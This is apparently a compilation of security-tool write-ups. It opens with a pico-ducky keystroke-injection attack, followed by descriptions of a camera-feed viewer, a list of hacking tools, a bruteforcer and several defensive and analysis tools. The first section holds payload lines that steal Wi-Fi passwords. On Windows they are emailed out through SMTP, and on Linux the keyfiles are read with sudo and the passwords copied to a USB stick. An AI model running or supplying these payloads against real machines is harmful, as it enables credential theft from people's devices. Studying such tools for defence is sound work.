The payload uses STRING command processes keystroke for injection. It accepts one or more alphanumeric/punctuation characters and will type the remainder of the line exactly as-is into the target machine. The ENTER/SPACE will simulate a press of keyboard keys.

Delays

We use DELAY command to temporarily pause execution of the payload. This is useful when a payload needs to wait for an element such as a Command Line to load. Delay is useful when used at the very beginning when a new USB device is connected to a targeted computer. Initially, the computer must complete a set of actions before it can begin accepting input commands. In the case of HIDs setup time is very short. In most cases, it takes a fraction of a second, because the drivers are built-in. However, in some instances, a slower PC may take longer to recognize the pico-ducky. The general advice is to adjust the delay time according to your target.

Exfiltration

Data exfiltration is an unauthorized transfer of data from a computer/device. Once the data is collected, adversary can package it to avoid detection while sending data over the network, using encryption or compression. Two most common way of exfiltration are:

  • Exfiltration over the network medium.
    • This approach was used for the Windows exploit. The whole payload can be seen here.

  • Exfiltration over a physical medium.
    • This approach was used for the Linux exploit. The whole payload can be seen here.

Windows exploit

In order to use the Windows payload (payload1.dd), you don't need to connect any jumper wire between pins.

Sending stolen data over email

Once passwords have been exported to the .txt file, payload will send the data to the appointed email using Yahoo SMTP. For more detailed instructions visit a following link. Also, the payload template needs to be updated with your SMTP information, meaning that you need to update RECEIVER_EMAIL, SENDER_EMAIL and yours email PASSWORD. In addition, you could also update the body and the subject of the email.

STRING Send-MailMessage -To 'RECEIVER_EMAIL' -from 'SENDER_EMAIL' -Subject "Stolen data from PC" -Body "Exploited data is stored in the attachment." -Attachments .\wifi_pass.txt -SmtpServer 'smtp.mail.yahoo.com' -Credential $(New-Object System.Management.Automation.PSCredential -ArgumentList 'SENDER_EMAIL', $('PASSWORD' | ConvertTo-SecureString -AsPlainText -Force)) -UseSsl -Port 587

 Note:

  • After sending data over the email, the .txt file is deleted.

  • You can also use some an SMTP from another email provider, but you should be mindful of SMTP server and port number you will write in the payload.

  • Keep in mind that some networks could be blocking usage of an unknown SMTP at the firewall.

Linux exploit

In order to use the Linux payload (payload2.dd) you need to connect a jumper wire between GND and GPIO5 in order to comply with the code in code.py on your RPi Pico. For more information about how to setup multiple payloads on your RPi Pico visit this link.

Storing stolen data to USB flash drive

Once passwords have been exported from the computer, data will be saved to the appointed USB flash drive. In order for this payload to function properly, it needs to be updated with the correct name of your USB drive, meaning you will need to replace USBSTICK with the name of your USB drive in two places.

STRING echo -e "Wireless_Network_Name Password\n--------------------- --------" > /media/$(hostname)/USBSTICK/wifi_pass.txt

STRING done >> /media/$(hostname)/USBSTICK/wifi_pass.txt

In addition, you will also need to update the Linux PASSWORD in the payload in three places. As stated above, in order for this exploit to be successful, you will need to know the victim's Linux machine password, which makes this attack less plausible.

STRING echo PASSWORD | sudo -S echo

STRING do echo -e "$(sudo <<< PASSWORD cat "$FILE" | grep -oP '(?<=ssid=).*') \t\t\t\t $(sudo <<< PASSWORD cat "$FILE" | grep -oP '(?<=psk=).*')"

Bash script

In order to run the wifi_passwords_print.sh script you will need to update the script with the correct name of your USB stick after which you can type in the following command in your terminal:

echo PASSWORD | sudo -S sh wifi_passwords_print.sh USBSTICK

where PASSWORD is your account's password and USBSTICK is the name for your USB device.

Quick overview of the payload

NetworkManager is based on the concept of connection profiles, and it uses plugins for reading/writing data. It uses .ini-style keyfile format and stores network configuration profiles. The keyfile is a plugin that supports all the connection types and capabilities that NetworkManager has. The files are located in /etc/NetworkManager/system-connections/. Based on the keyfile format, the payload uses the grep command with regex in order to extract data of interest. For file filtering, a modified positive lookbehind assertion was used ((?<=keyword)). While the positive lookbehind assertion will match at a certain position in the string, sc. at a position right after the keyword without making that text itself part of the match, the regex (?<=keyword).* will match any text after the keyword. This allows the payload to match the values after SSID and psk (pre-shared key) keywords.

For more information about NetworkManager here is some useful links:

Exfiltrated data formatting

Below is an example of the exfiltrated and formatted data from a victim's machine in a .txt file.

Wireless_Network_Name Password
--------------------- --------
WLAN1 pass1
WLAN2 pass2
WLAN3 pass3

USB Mass Storage Device Problem

One of the advantages of Rubber Ducky over RPi Pico is that it doesn't show up as a USB mass storage device once plugged in. Once plugged into the computer, all the machine sees it as a USB keyboard. This isn't a default behavior for the RPi Pico. If you want to prevent your RPi Pico from showing up as a USB mass storage device when plugged in, you need to connect a jumper wire between pin 18 (GND) and pin 20 (GPIO15). For more details visit this link.

ο’‘ Tip:

  • Upload your payload to RPi Pico before you connect the pins.
  • Don't solder the pins because you will probably want to change/update the payload at some point.

Payload Writer

When creating a functioning payload file, you can use the writer.py script, or you can manually change the template file. In order to run the script successfully you will need to pass, in addition to the script file name, a name of the OS (windows or linux) and the name of the payload file (e.q. payload1.dd). Below you can find an example how to run the writer script when creating a Windows payload.

python3 writer.py windows payload1.dd

Limitations/Drawbacks

  • This pico-ducky currently works only on Windows OS.

  • This attack requires physical access to an unlocked device in order to be successfully deployed.

  • The Linux exploit is far less likely to be successful, because in order to succeed, you not only need physical access to an unlocked device, you also need to know the admins password for the Linux machine.

  • Machine's firewall or network's firewall may prevent stolen data from being sent over the network medium.

  • Payload delays could be inadequate due to varying speeds of different computers used to deploy an attack.

  • The pico-ducky device isn't really stealthy, actually it's quite the opposite, it's really bulky especially if you solder the pins.

  • Also, the pico-ducky device is noticeably slower compared to the Rubber Ducky running the same script.

  • If the Caps Lock is ON, some of the payload code will not be executed and the exploit will fail.

  • If the computer has a non-English Environment set, this exploit won't be successful.

  • Currently, pico-ducky doesn't support DuckyScript 3.0, only DuckyScript 1.0 can be used. If you need the 3.0 version you will have to use the Rubber Ducky.

To-Do List

  • Fix Caps Lock bug.
  • Fix non-English Environment bug.
  • Obfuscate the command prompt.
  • Implement exfiltration over a physical medium.
  • Create a payload for Linux.
  • Encode/Encrypt exfiltrated data before sending it over email.
  • Implement indicator of successfully completed exploit.
  • Implement command history clean-up for Linux exploit.
  • Enhance the Linux exploit in order to avoid usage of sudo.


Pantheon - Insecure Camera Parser

By: Zion3R


Pantheon is a GUI application that allows users to display information regarding network cameras in various countries as well as an integrated live-feed for non-protected cameras.

Functionalities

Pantheon allows users to execute an API crawler. There was original functionality without the use of any API's (like Insecam), but Google TOS kept getting in the way of the original scraping mechanism.


Installation

  1. git clone https://github.com/josh0xA/Pantheon.git
  2. cd Pantheon
  3. pip3 install -r requirements.txt
    Execution: python3 pantheon.py
  • Note: I will later add a GUI installer to make it fully indepenent of a CLI

Windows

  • You can just follow the steps above or download the official package here.
  • Note, the PE binary of Pantheon was put together using pyinstaller, so Windows Defender might get a bit upset.

Ubuntu

  • First, complete steps 1, 2 and 3 listed above.
  • chmod +x distros/ubuntu_install.sh
  • ./distros/ubuntu_install.sh

Debian and Kali Linux

  • First, complete steps 1, 2 and 3 listed above.
  • chmod +x distros/debian-kali_install.sh
  • ./distros/debian-kali_install.sh

MacOS

  • The regular installation steps above should suffice. If not, open up an issue.

Usage

(Enter) on a selected IP:Port to establish a Pantheon webview of the camera. (Use this at your own risk)

(Left-click) on a selected IP:Port to view the geolocation of the camera.
(Right-click) on a selected IP:Port to view the HTTP data of the camera (Ctrl+Left-click for Mac).

Adjust the map as you please to see the markers.

  • Also note that this app is far from perfect and not every link that shows up is a live-feed, some are login pages (Do NOT attempt to login).

Ethical Notice

The developer of this program, Josh Schiavone, is not resposible for misuse of this data gathering tool. Pantheon simply provides information that can be indexed by any modern search engine. Do not try to establish unauthorized access to live feeds that are password protected - that is illegal. Furthermore, if you do choose to use Pantheon to view a live-feed, do so at your own risk. Pantheon was developed for educational purposes only. For further information, please visit: https://joshschiavone.com/panth_info/panth_ethical_notice.html

Licence

MIT License
Copyright (c) Josh Schiavone



Top 20 Most Popular Hacking Tools in 2023

By: Zion3R

As last year, this year we made a ranking with the most popular tools between January and December 2023.

The tools of this year encompass a diverse range of cybersecurity disciplines, including AI-Enhanced Penetration Testing, Advanced Vulnerability Management, Stealth Communication Techniques, Open-Source General Purpose Vulnerability Scanning, and more.

Without going into further details, we have prepared a useful list of the most popular tools in Kitploit 2023:


  1. PhoneSploit-Pro - An All-In-One Hacking Tool To Remotely Exploit Android Devices Using ADB And Metasploit-Framework To Get A Meterpreter Session


  2. Gmailc2 - A Fully Undetectable C2 Server That Communicates Via Google SMTP To Evade Antivirus Protections And Network Traffic Restrictions


  3. Faraday - Open Source Vulnerability Management Platform


  4. CloakQuest3r - Uncover The True IP Address Of Websites Safeguarded By Cloudflare


  5. Killer - Is A Tool Created To Evade AVs And EDRs Or Security Tools


  6. Geowifi - Search WiFi Geolocation Data By BSSID And SSID On Different Public Databases


  7. Waf-Bypass - Check Your WAF Before An Attacker Does


  8. PentestGPT - A GPT-empowered Penetration Testing Tool


  9. Sirius - First Truly Open-Source General Purpose Vulnerability Scanner


  10. LSMS - Linux Security And Monitoring Scripts


  11. GodPotato - Local Privilege Escalation Tool From A Windows Service Accounts To NT AUTHORITY\SYSTEM


  12. Bypass-403 - A Simple Script Just Made For Self Use For Bypassing 403


  13. ThunderCloud - Cloud Exploit Framework


  14. GPT_Vuln-analyzer - Uses ChatGPT API And Python-Nmap Module To Use The GPT3 Model To Create Vulnerability Reports Based On Nmap Scan Data


  15. Kscan - Simple Asset Mapping Tool


  16. RedTeam-Physical-Tools - Red Team Toolkit - A Curated List Of Tools That Are Commonly Used In The Field For Physical Security, Red Teaming, And Tactical Covert Entry


  17. DNSWatch - DNS Traffic Sniffer and Analyzer


  18. IpGeo - Tool To Extract IP Addresses From Captured Network Traffic File


  19. TelegramRAT - Cross Platform Telegram Based RAT That Communicates Via Telegram To Evade Network Restrictions


  20. XSS-Exploitation-Tool - An XSS Exploitation Tool





Happy New Year wishes the KitPloit team!


VED-eBPF - Kernel Exploit And Rootkit Detection Using eBPF

By: Zion3R


VED (Vault Exploit Defense)-eBPF leverages eBPF (extended Berkeley Packet Filter) to implement runtime kernel security monitoring and exploit detection for Linux systems.

Introduction

eBPF is an in-kernel virtual machine that allows code execution in the kernel without modifying the kernel source itself. eBPF programs can be attached to tracepoints, kprobes, and other kernel events to efficiently analyze execution and collect data.

VED-eBPF uses eBPF to trace security-sensitive kernel behaviors and detect anomalies that could indicate an exploit or rootkit. It provides two main detections:

  • wCFI (Control Flow Integrity) traces the kernel call stack to detect control flow hijacking attacks. It works by generating a bitmap of valid call sites and validating each return address matches a known callsite.

  • PSD (Privilege Escalation Detection) traces changes to credential structures in the kernel to detect unauthorized privilege escalations.


How it Works

VED-eBPF attaches eBPF programs to kernel functions to trace execution flows and extract security events. The eBPF programs submit these events via perf buffers to userspace for analysis.

wCFI

wCFI traces the call stack by attaching to functions specified on the command line. On each call, it dumps the stack, assigns a stack ID, and validates the return addresses against a precomputed bitmap of valid call sites generated from objdump and /proc/kallsyms.

If an invalid return address is detected, indicating a corrupted stack, it generates a wcfi_stack_event containing:

* Stack trace
* Stack ID
* Invalid return address

This security event is submitted via perf buffers to userspace.

The wCFI eBPF program also tracks changes to the stack pointer and kernel text region to keep validation up-to-date.

PSD

PSD traces credential structure modifications by attaching to functions like commit_creds and prepare_kernel_cred. On each call, it extracts information like:

* Current process credentials
* Hashes of credentials and user namespace
* Call stack

It compares credentials before and after the call to detect unauthorized changes. If an illegal privilege escalation is detected, it generates a psd_event containing the credential fields and submits it via perf buffers.

Prerequsites

VED-eBPF requires:

  • Linux kernel v5.17+ (tested on v5.17)
  • eBPF support enabled
  • BCC toolkit

Current Status

VED-eBPF is currently a proof-of-concept demonstrating the potential for eBPF-based kernel exploit and rootkit detection. Ongoing work includes:

  • Expanding attack coverage
  • Performance optimization
  • Additional kernel versions
  • Integration with security analytics

Conclusion

VED-eBPF shows the promise of eBPF for building efficient, low-overhead kernel security monitoring without kernel modification. By leveraging eBPF tracing and perf buffers, critical security events can be extracted in real-time and analyzed to identify emerging kernel threats for cloud native envionrment.



Legba - A Multiprotocol Credentials Bruteforcer / Password Sprayer And Enumerator

By: Zion3R


Legba is a multiprotocol credentials bruteforcer / password sprayer and enumerator built with Rust and the Tokio asynchronous runtime in order to achieve better performances and stability while consuming less resources than similar tools (see the benchmark below).

For the building instructions, usage and the complete list of options check the project Wiki.


Supported Protocols/Features:

AMQP (ActiveMQ, RabbitMQ, Qpid, JORAM and Solace), Cassandra/ScyllaDB, DNS subdomain enumeration, FTP, HTTP (basic authentication, NTLMv1, NTLMv2, multipart form, custom requests with CSRF support, files/folders enumeration, virtual host enumeration), IMAP, Kerberos pre-authentication and user enumeration, LDAP, MongoDB, MQTT, Microsoft SQL, MySQL, Oracle, PostgreSQL, POP3, RDP, Redis, SSH / SFTP, SMTP, STOMP (ActiveMQ, RabbitMQ, HornetQ and OpenMQ), TCP port scanning, Telnet, VNC.

Benchmark

Here's a benchmark of legba versus thc-hydra running some common plugins, both targeting the same test servers on localhost. The benchmark has been executed on a macOS laptop with an M1 Max CPU, using a wordlist of 1000 passwords with the correct one being on the last line. Legba was compiled in release mode, Hydra compiled and installed via brew formula.

Far from being an exhaustive benchmark (some legba features are simply not supported by hydra, such as CSRF token grabbing), this table still gives a clear idea of how using an asynchronous runtime can drastically improve performances.

Test Name Hydra Tasks Hydra Time Legba Tasks Legba Time
HTTP basic auth 16 7.100s 10 1.560s (οš€ 4.5x faster)
HTTP POST login (wordpress) 16 14.854s 10 5.045s (οš€ 2.9x faster)
SSH 16 7m29.85s * 10 8.150s (οš€ 55.1x faster)
MySQL 4 ** 9.819s 4 ** 2.542s (οš€ 3.8x faster)
Microsoft SQL 16 7.609s 10 4.789s (οš€ 1.5x faster)

* While this result would suggest a default delay between connection attempts used by Hydra. I've tried to study the source code to find such delay but to my knowledge there's none. For some reason it's simply very slow.
** For MySQL hydra automatically reduces the amount of tasks to 4, therefore legba's concurrency level has been adjusted to 4 as well.

License

Legba is released under the GPL 3 license. To see the licenses of the project dependencies, install cargo license with cargo install cargo-license and then run cargo license.



BestEdrOfTheMarket - Little AV/EDR Bypassing Lab For Training And Learning Purposes

By: Zion3R


Little AV/EDR Evasion Lab for training & learning purposes. (️ under construction..)​

 ____            _     _____ ____  ____     ___   __   _____ _
| __ ) ___ ___| |_ | ____| _ \| _ \ / _ \ / _| |_ _| |__ ___
| _ \ / _ \/ __| __| | _| | | | | |_) | | | | | |_ | | | '_ \ / _ \
| |_) | __/\__ \ |_ | |___| |_| | _ < | |_| | _| | | | | | | __/
|____/_\___||___/\__| |_____|____/|_| \_\ \___/|_| |_| |_| |_|\___|
| \/ | __ _ _ __| | _____| |_
| |\/| |/ _` | '__| |/ / _ \ __|
| | | | (_| | | | < __/ |_ Yazidou - github.com/Xacone
|_| |_|\__,_|_| |_|\_\___|\__|


BestEDROfTheMarket is a naive user-mode EDR (Endpoint Detection and Response) project, designed to serve as a testing ground for understanding and bypassing EDR's user-mode detection methods that are frequently used by these security solutions.
These techniques are mainly based on a dynamic analysis of the target process state (memory, API calls, etc.),

Feel free to check this short article I wrote that describe the interception and analysis methods implemented by the EDR.


Defensive Techniques

In progress:


Usage

        Usage: BestEdrOfTheMarket.exe [args]

/help Shows this help message and quit
/v Verbosity
/iat IAT hooking
/stack Threads call stack monitoring
/nt Inline Nt-level hooking
/k32 Inline Kernel32/Kernelbase hooking
/ssn SSN crushing
BestEdrOfTheMarket.exe /stack /v /k32
BestEdrOfTheMarket.exe /stack /nt
BestEdrOfTheMarket.exe /iat


Blutter - Flutter Mobile Application Reverse Engineering Tool

By: Zion3R


Flutter Mobile Application Reverse Engineering Tool by Compiling Dart AOT Runtime

Currently the application supports only Android libapp.so (arm64 only). Also the application is currently work only against recent Dart versions.

For high priority missing features, see TODO


Environment Setup

This application uses C++20 Formatting library. It requires very recent C++ compiler such as g++>=13, Clang>=15.

I recommend using Linux OS (only tested on Deiban sid/trixie) because it is easy to setup.

Debian Unstable (gcc 13)

  • Install build tools and depenencies
apt install python3-pyelftools python3-requests git cmake ninja-build \
build-essential pkg-config libicu-dev libcapstone-dev

Windows

  • Install git and python 3
  • Install latest Visual Studio with "Desktop development with C++" and "C++ CMake tools"
  • Install required libraries (libcapstone and libicu4c)
python scripts\init_env_win.py
  • Start "x64 Native Tools Command Prompt"

macOS Ventura (clang 15)

  • Install XCode
  • Install clang 15 and required tools
brew install llvm@15 cmake ninja pkg-config icu4c capstone
pip3 install pyelftools requests

Usage

Extract "lib" directory from apk file

python3 blutter.py path/to/app/lib/arm64-v8a out_dir

The blutter.py will automatically detect the Dart version from the flutter engine and call executable of blutter to get the information from libapp.so.

If the blutter executable for required Dart version does not exists, the script will automatically checkout Dart source code and compiling it.

Update

You can use git pull to update and run blutter.py with --rebuild option to force rebuild the executable

python3 blutter.py path/to/app/lib/arm64-v8a out_dir --rebuild

Output files

  • asm/* libapp assemblies with symbols
  • blutter_frida.js the frida script template for the target application
  • objs.txt complete (nested) dump of Object from Object Pool
  • pp.txt all Dart objects in Object Pool

Directories

  • bin contains blutter executables for each Dart version in "blutter_dartvm<ver>_<os>_<arch>" format
  • blutter contains source code. need building against Dart VM library
  • build contains building projects which can be deleted after finishing the build process
  • dartsdk contains checkout of Dart Runtime which can be deleted after finishing the build process
  • external contains 3rd party libraries for Windows only
  • packages contains the static libraries of Dart Runtime
  • scripts contains python scripts for getting/building Dart

Generating Visual Studio Solution for Development

I use Visual Studio to delevlop Blutter on Windows. --vs-sln options can be used to generate a Visual Studio solution.

python blutter.py path\to\lib\arm64-v8a build\vs --vs-sln

TODO

  • More code analysis
    • Function arguments and return type
    • Some psuedo code for code pattern
  • Generate better Frida script
    • More internal classes
    • Object modification
  • Obfuscated app (still missing many functions)
  • Reading iOS binary
  • Input as apk or ipa


Metahub - An Automated Contextual Security Findings Enrichment And Impact Evaluation Tool For Vulnerability Management

By: Zion3R


MetaHub is an automated contextual security findings enrichment and impact evaluation tool for vulnerability management. You can use it with AWS Security Hub or any ASFF-compatible security scanner. Stop relying on useless severities and switch to impact scoring definitions based on YOUR context.


MetaHub is an open-source security tool for impact-contextual vulnerability management. It can automate the process of contextualizing security findings based on your environment and your needs: YOUR context, identifying ownership, and calculate an impact scoring based on it that you can use for defining prioritization and automation. You can use it with AWS Security Hub or any ASFF security scanners (like Prowler).

MetaHub describe your context by connecting to your affected resources in your affected accounts. It can describe information about your AWS account and organization, the affected resources tags, the affected CloudTrail events, your affected resource configurations, and all their associations: if you are contextualizing a security finding affecting an EC2 Instance, MetaHub will not only connect to that instance itself but also its IAM Roles; from there, it will connect to the IAM Policies associated with those roles. It will connect to the Security Groups and analyze all their rules, the VPC and the Subnets where the instance is running, the Volumes, the Auto Scaling Groups, and more.

After fetching all the information from your context, MetaHub will evaluate certain important conditions for all your resources: exposure, access, encryption, status, environment and application. Based on those calculations and in addition to the information from the security findings affecting the resource all together, MetaHub will generate a Scoring for each finding.

Check the following dashboard generated by MetaHub. You have the affected resources, grouping all the security findings affecting them together and the original severity of the finding. After that, you have the Impact Score and all the criteria MetaHub evaluated to generate that score. All this information is filterable, sortable, groupable, downloadable, and customizable.



You can rely on this Impact Score for prioritizing findings (where should you start?), directing attention to critical issues, and automating alerts and escalations.

MetaHub can also filter, deduplicate, group, report, suppress, or update your security findings in automated workflows. It is designed for use as a CLI tool or within automated workflows, such as AWS Security Hub custom actions or AWS Lambda functions.

The following is the JSON output for a an EC2 instance; see how MetaHub organizes all the information about its context together, under associations, config, tags, account cloudtrail, and impact



Context

In MetaHub, context refers to information about the affected resources like their configuration, associations, logs, tags, account, and more.

MetaHub doesn't stop at the affected resource but analyzes any associated or attached resources. For instance, if there is a security finding on an EC2 instance, MetaHub will not only analyze the instance but also the security groups attached to it, including their rules. MetaHub will examine the IAM roles that the affected resource is using and the policies attached to those roles for any issues. It will analyze the EBS attached to the instance and determine if they are encrypted. It will also analyze the Auto Scaling Groups that the instance is associated with and how. MetaHub will also analyze the VPC, Subnets, and other resources associated with the instance.

The Context module has the capability to retrieve information from the affected resources, affected accounts, and every associated resources. The context module has five main parts: config (which includes associations as well), tags, cloudtrail, and account. By default config and tags are enabled, but you can change this behavior using the option --context (for enabling all the context modules you can use --context config tags cloudtrail account). The output of each enabled key will be added under the affected resource.

Config

Under the config key, you can find anyting related to the configuration of the affected resource. For example, if the affected resource is an EC2 Instance, you will see keys like private_ip, public_ip, or instance_profile.

You can filter your findings based on Config outputs using the option: --mh-filters-config <key> {True/False}. See Config Filtering.

Associations

Under the associations key, you will find all the associated resources of the affected resource. For example, if the affected resource is an EC2 Instance, you will find resources like: Security Groups, IAM Roles, Volumes, VPC, Subnets, Auto Scaling Groups, etc. Each time MetaHub finds an association, it will connect to the associated resource again and fetch its own context.

Associations are key to understanding the context and impact of your security findings as their exposure.

You can filter your findings based on Associations outputs using the option: --mh-filters-config <key> {True/False}. See Config Filtering.

Tags

MetaHub relies on AWS Resource Groups Tagging API to query the tags associated with your resources.

Note that not all AWS resource type supports this API. You can check supported services.

Tags are a crucial part of understanding your context. Tagging strategies often include:

  • Environment (like Production, Staging, Development, etc.)
  • Data classification (like Confidential, Restricted, etc.)
  • Owner (like a team, a squad, a business unit, etc.)
  • Compliance (like PCI, SOX, etc.)

If you follow a proper tagging strategy, you can filter and generate interesting outputs. For example, you could list all findings related to a specific team and provide that data directly to that team.

You can filter your findings based on Tags outputs using the option: --mh-filters-tags TAG=VALUE. See Tags Filtering

CloudTrail

Under the key cloudtrail, you will find critical Cloudtrail events related to the affected resource, such as creating events.

The Cloudtrail events that we look for are defined by resource type, and you can add, remove or change them by editing the configuration file resources.py.

For example for an affected resource of type Security Group, MetaHub will look for the following events:

  • CreateSecurityGroup: Security Group Creation event
  • AuthorizeSecurityGroupIngress: Security Group Rule Authorization event.

Account

Under the key account, you will find information about the account where the affected resource is runnning, like if it's part of an AWS Organizations, information about their contacts, etc.

Ownership

MetaHub also focuses on ownership detection. It can determine the owner of the affected resource in various ways. This information can be used to automatically assign a security finding to the correct owner, escalate it, or make decisions based on this information.

An automated way to determine the owner of a resource is critical for security teams. It allows them to focus on the most critical issues and escalate them to the right people in automated workflows. But automating workflows this way, it is only viable if you have a reliable way to define the impact of a finding, which is why MetaHub also focuses on impact.

Impact

The impact module in MetaHub focuses on generating a score for each finding based on the context of the affected resource and all the security findings affecting them. For the context, we define a series of evaluated criteria; you can add, remove, or modify these criteria based on your needs. The Impact criteria are combined with a metric generated based on all the Security Findings affecting the affected resource and their severities.

The following are the impact criteria that MetaHub evaluates by default:

Exposure

Exposure evaluates the how the the affected resource is exposed to other networks. For example, if the affected resource is public, if it is part of a VPC, if it has a public IP or if it is protected by a firewall or a security group.

Possible Statuses Value Description
ο”΄ effectively-public 100% The resource is effectively public from the Internet.
 restricted-public 40% The resource is public, but there is a restriction like a Security Group.
 unrestricted-private 30% The resource is private but unrestricted, like an open security group.
 launch-public 10% These are resources that can launch other resources as public. For example, an Auto Scaling group or a Subnet.
 restricted 0% The resource is restricted.
ο”΅ unknown - The resource couldn't be checked

Access

Access evaluates the resource policy layer. MetaHub checks every available policy including: IAM Managed policies, IAM Inline policies, Resource Policies, Bucket ACLS, and any association to other resources like IAM Roles which its policies are also analyzed . An unrestricted policy is not only an itsue itself of that policy, it afected any other resource which is using it.

Possible Statuses Value Description
ο”΄ unrestricted 100% The principal is unrestricted, without any condition or restriction.
ο”΄ untrusted-principal 70% The principal is an AWS Account, not part of your trusted accounts.
 unrestricted-principal 40% The principal is not restricted, defined with a wildcard. It could be conditions restricting it or other restrictions like s3 public blocks.
 cross-account-principal 30% The principal is from another AWS account.
 unrestricted-actions 30% The actions are defined using wildcards.
 dangerous-actions 30% Some dangerous actions are defined as part of this policy.
 unrestricted-service 10% The policy allows an AWS service as principal without restriction.
 restricted 0% The policy is restricted.
ο”΅ unknown - The policy couldn't be checked.

Encryption

Encryption evaluate the different encryption layers based on each resource type. For example, for some resources it evaluates if at_rest and in_transit encryption configuration are both enabled.

Possible Statuses Value Description
ο”΄ unencrypted 100% The resource is not fully encrypted.
 encrypted 0% The resource is fully encrypted including any of it's associations.
ο”΅ unknown - The resource encryption couldn't be checked.

Status

Status evaluate the status of the affected resource in terms of attachment or functioning. For example, for an EC2 Instance we evaluate if the resource is running, stopped, or terminated, but for resources like EBS Volumes and Security Groups, we evaluate if those resources are attached to any other resource.

Possible Statuses Value Description
 attached 100% The resource supports attachment and is attached.
 running 100% The resource supports running and is running.
 enabled 100% The resource supports enabled and is enabled.
 not-attached 0% The resource supports attachment, and it is not attached.
 not-running 0% The resource supports running and it is not running.
 not-enabled 0% The resource supports enabled and it is not enabled.
ο”΅ unknown - The resource couldn't be checked for status.

Environment

Environment evaluates the environment where the affected resource is running. By default, MetaHub defines 3 environments: production, staging, and development, but you can add, remove, or modify these environments based on your needs. MetaHub evaluates the environment based on the tags of the affected resource, the account id or the account alias. You can define your own environemnts definitions and strategy in the configuration file (See Customizing Configuration).

Possible Statuses Value Description
 production 100% It is a production resource.
 staging 30% It is a staging resource.
 development 0% It is a development resource.
ο”΅ unknown - The resource couldn't be checked for enviroment.

Application

Application evaluates the application that the affected resource is part of. MetaHub relies on the AWS myApplications feature, which relies on the Tag awsApplication, but you can extend this functionality based on your context for example by defining other tags you use for defining applications or services (like Service or any other), or by relying on account id or alias. You can define your application definitions and strategy in the configuration file (See Customizing Configuration).

Possible Statuses Value Description
ο”΅ unknown - The resource couldn't be checked for application.

Findings Soring

As part of the impact score calculation, we also evaluate the total ammount of security findings and their severities affecting the resource. We use the following formula to calculate this metric:

(SUM of all (Finding Severity / Highest Severity) with a maximum of 1)

For example, if the affected resource has two findings affecting it, one with HIGH and another with LOW severity, the Impact Findings Score will be:

SUM(HIGH (3) / CRITICAL (4) + LOW (0.5) / CRITICAL (4)) = 0.875

Architecture

MetaHub reads your security findings from AWS Security Hub or any ASFF-compatible security scanner. It then queries the affected resources directly in the affected account to provide additional context. Based on that context, it calculates it's impact. Finally, it generates different outputs based on your needs.



Use Cases

Some use cases for MetaHub include:

  • MetaHub integration with Prowler as a local scanner for context enrichment
  • Automating Security Hub findings suppression based on Tagging
  • Integrate MetaHub directly as Security Hub custom action to use it directly from the AWS Console
  • Created enriched HTML reports for your findings that you can filter, sort, group, and download
  • Create Security Hub Insights based on MetaHub context

Features

MetaHub provides a range of ways to list and manage security findings for investigation, suppression, updating, and integration with other tools or alerting systems. To avoid Shadowing and Duplication, MetaHub organizes related findings together when they pertain to the same resource. For more information, refer to Findings Aggregation

MetaHub queries the affected resources directly in the affected account to provide additional context using the following options:

  • Config: Fetches the most important configuration values from the affected resource.
  • Associations: Fetches all the associations of the affected resource, such as IAM roles, security groups, and more.
  • Tags: Queries tagging from affected resources
  • CloudTrail: Queries CloudTrail in the affected account to identify who created the resource and when, as well as any other related critical events
  • Account: Fetches extra information from the account where the affected resource is running, such as the account name, security contacts, and other information.

MetaHub supports filters on top of these context* outputs to automate the detection of other resources with the same issues. You can filter security findings affecting resources tagged in a certain way (e.g., Environment=production) and combine this with filters based on Config or Associations, like, for example, if the resource is public, if it is encrypted, only if they are part of a VPC, if they are using a specific IAM role, and more. For more information, refer to Config filters and Tags filters for more information.

But that's not all. If you are using MetaHub with Security Hub, you can even combine the previous filters with the Security Hub native filters (AWS Security Hub filtering). You can filter the same way you would with the AWS CLI utility using the option --sh-filters, but in addition, you can save and re-use your filters as YAML files using the option --sh-template.

If you prefer, With MetaHub, you can back enrich your findings directly in AWS Security Hub using the option --enrich-findings. This action will update your AWS Security Hub findings using the field UserDefinedFields. You can then create filters or Insights directly in AWS Security Hub and take advantage of the contextualization added by MetaHub.

When investigating findings, you may need to update security findings altogether. MetaHub also allows you to execute bulk updates to AWS Security Hub findings, such as changing Workflow Status using the option --update-findings. As an example, you identified that you have hundreds of security findings about public resources. Still, based on the MetaHub context, you know those resources are not effectively public as they are protected by routing and firewalls. You can update all the findings for the output of your MetaHub query with one command. When updating findings using MetaHub, you also update the field Note of your finding with a custom text for future reference.

MetaHub supports different Output Modes, some of them json based like json-inventory, json-statistics, json-short, json-full, but also powerfull html, xlsx and csv. These outputs are customizable; you can choose which columns to show. For example, you may need a report about your affected resources, adding the tag Owner, Service, and Environment and nothing else. Check the configuration file and define the columns you need.

MetaHub supports multi-account setups. You can run the tool from any environment by assuming roles in your AWS Security Hub master account and your child/service accounts where your resources live. This allows you to fetch aggregated data from multiple accounts using your AWS Security Hub multi-account implementation while also fetching and enriching those findings with data from the accounts where your affected resources live based on your needs. Refer to Configuring Security Hub for more information.

Customizing Configuration

MetaHub uses configuration files that let you customize some checks behaviors, default filters, and more. The configuration files are located in lib/config/.

Things you can customize:

  • lib/config/configuration.py: This file contains the default configuration for MetaHub. You can change the default filters, the default output modes, the environment definitions, and more.

  • lib/config/impact.py: This file contains the values and it's weights for the impact formula criteria. You can modify the values and the weights based on your needs.

  • lib/config/reources.py: This file contains definitions for every resource type, like which CloudTrail events to look for.

Run with Python

MetaHub is a Python3 program. You need to have Python3 installed in your system and the required Python modules described in the file requirements.txt.

Requirements can be installed in your system manually (using pip3) or using a Python virtual environment (suggested method).

Run it using Python Virtual Environment

  1. Clone the repository: git clone git@github.com:gabrielsoltz/metahub.git
  2. Change to repostiory dir: cd metahub
  3. Create a virtual environment for this project: python3 -m venv venv/metahub
  4. Activate the virtual environment you just created: source venv/metahub/bin/activate
  5. Install Metahub requirements: pip3 install -r requirements.txt
  6. Run: ./metahub -h
  7. Deactivate your virtual environment after you finish with: deactivate

Next time, you only need steps 4 and 6 to use the program.

Alternatively, you can run this tool using Docker.

Run with Docker

MetaHub is also available as a Docker image. You can run it directly from the public Docker image or build it locally.

The available tagging for MetaHub containers are the following:

  • latest: in sync with master branch
  • <x.y.z>: you can find the releases here
  • stable: this tag always points to the latest release.

For running from the public registry, you can run the following command:

docker run -ti public.ecr.aws/n2p8q5p4/metahub:latest ./metahub -h

AWS credentials and Docker

If you are already logged into the AWS host machine, you can seamlessly use the same credentials within a Docker container. You can achieve this by either passing the necessary environment variables to the container or by mounting the credentials file.

For instance, you can run the following command:

